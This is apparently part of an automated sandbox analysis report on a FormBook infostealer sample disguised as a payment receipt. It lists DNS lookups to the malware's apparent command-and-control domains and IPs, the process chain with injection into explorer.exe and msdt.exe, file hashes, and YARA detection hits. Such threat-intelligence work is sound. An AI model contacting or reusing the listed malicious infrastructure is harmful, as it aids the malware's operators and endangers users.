Nov 29, 2022 16:44:10.895929098 CET | 192.168.2.7 | 8.8.8.8 | 0x9572 | Standard query (0) | www.kahrabaonline.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 29, 2022 16:43:29.596674919 CET | 8.8.8.8 | 192.168.2.7 | 0x36cc | No error (0) | www.030332.com | 58777.zhanghonghong.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 29, 2022 16:43:29.596674919 CET | 8.8.8.8 | 192.168.2.7 | 0x36cc | No error (0) | 58777.zhanghonghong.com | | 103.100.208.243 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:43:40.623732090 CET | 8.8.8.8 | 192.168.2.7 | 0xee3c | No error (0) | www.vnsuda.lol | | 75.2.115.196 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:43:49.039021015 CET | 8.8.8.8 | 192.168.2.7 | 0x818 | No error (0) | www.coolfashionshop.xyz | | 34.110.163.134 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:43:56.273133039 CET | 8.8.8.8 | 192.168.2.7 | 0xf885 | No error (0) | www.stephapproved.com | stephapproved.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 29, 2022 16:43:56.273133039 CET | 8.8.8.8 | 192.168.2.7 | 0xf885 | No error (0) | stephapproved.com | | 70.32.23.81 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:44:03.757194996 CET | 8.8.8.8 | 192.168.2.7 | 0xf051 | No error (0) | www.bem4u.shop | bem4u.shop | | CNAME (Canonical name) | IN (0x0001) | false
Nov 29, 2022 16:44:03.757194996 CET | 8.8.8.8 | 192.168.2.7 | 0xf051 | No error (0) | bem4u.shop | | 2.57.90.16 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:44:11.068994045 CET | 8.8.8.8 | 192.168.2.7 | 0x9572 | No error (0) | www.kahrabaonline.com | | 160.121.219.144 | A (IP address) | IN (0x0001) | false
                                                      • www.030332.com
                                                      • www.vnsuda.lol
                                                      • www.coolfashionshop.xyz
                                                      • www.stephapproved.com
                                                      • www.bem4u.shop

                                                      Target ID:0
                                                      Start time:16:42:03
                                                      Start date:29/11/2022
                                                      Path:C:\Users\user\Desktop\payment_copy2_receipt.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\Desktop\payment_copy2_receipt.exe
                                                      Imagebase:0x400000
                                                      File size:548510 bytes
                                                      MD5 hash:9B8C61DED729CA6C9D5F7FDED18EEF27
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low

                                                      Target ID:1
                                                      Start time:16:42:04
                                                      Start date:29/11/2022
                                                      Path:C:\Users\user\AppData\Local\Temp\fcvvthv.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\fcvvthv.exe" C:\Users\user~1\AppData\Local\Temp\abggklv.q
                                                      Imagebase:0x400000
                                                      File size:125440 bytes
                                                      MD5 hash:353F7D8845E3DD77D50661A00EC7DF55
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 54%, ReversingLabs
                                                      Reputation:low

                                                      Target ID:2
                                                      Start time:16:42:04
                                                      Start date:29/11/2022
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6edaf0000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

Target ID: 3
Start time: 16:42:05
Start date: 29/11/2022
Path: C:\Users\user\AppData\Local\Temp\fcvvthv.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user~1\AppData\Local\Temp\fcvvthv.exe" C:\Users\user~1\AppData\Local\Temp\abggklv.q
Imagebase: 0x400000
File size: 125440 bytes
MD5 hash: 353F7D8845E3DD77D50661A00EC7DF55
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

Target ID: 4
Start time: 16:42:12
Start date: 29/11/2022
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff75ed40000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: high

Target ID: 12
Start time: 16:42:52
Start date: 29/11/2022
Path: C:\Windows\SysWOW64\msdt.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\msdt.exe
Imagebase: 0xaf0000
File size: 1508352 bytes
MD5 hash: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

No disassembly